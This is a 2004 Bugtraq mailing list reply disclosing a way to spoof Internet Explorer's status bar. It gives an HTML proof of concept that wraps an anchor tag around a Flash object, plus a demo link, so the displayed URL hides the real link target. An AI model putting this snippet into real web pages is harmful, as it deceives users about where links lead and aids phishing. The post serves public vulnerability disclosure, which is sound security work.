Bugtraq mailing list archives

Re: New URL spoofing bug in Microsoft Internet Explorer

From: roozbeh afrasiabi <roozbeh_afrasiabi () yahoo com>
Date: 8 Nov 2004 23:30:55 -0000

In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@oemcomputer>

Here is another way of spoofing the status bar:


<a> tag + &lt;object&gt; tag



<!--A HREF=http://www.yahoo.com><!--OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
 codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0";
 WIDTH="300" HEIGHT="50" id="link" ALIGN="">
 <PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high > <PARAM NAME=bgcolor VALUE=#FFFFFF> <PARAM 
NAME=menu  
VALU=FALSE>
  &lt;EMBED src="link.swf" quality=high bgcolor=#FFFFFF  WIDTH="300" HEIGHT="50" NAME="link" ALIGN=""
 TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer";>&lt;/EMBED&gt;
</a>&lt;/OBJECT&gt;</a>

*this method of spoofing the status bar allows malicious users to hide the target url from suspecting ppl ,demo page 
uses flash to generate
random urls.


demo:
http://www.persiax.com/pocs/statusbar/status.htm

Current thread:

Re: New URL spoofing bug in Microsoft Internet Explorer roozbeh afrasiabi (Nov 09)
- Re: New URL spoofing bug in Microsoft Internet Explorer q q (Nov 16)
  - Re: New URL spoofing bug in Microsoft Internet Explorer GuidoZ (Nov 17)
- <Possible follow-ups>
- Re: New URL spoofing bug in Microsoft Internet Explorer http-equiv () excite com (Nov 11)
- RE: New URL spoofing bug in Microsoft Internet Explorer Michael Silk (Nov 17)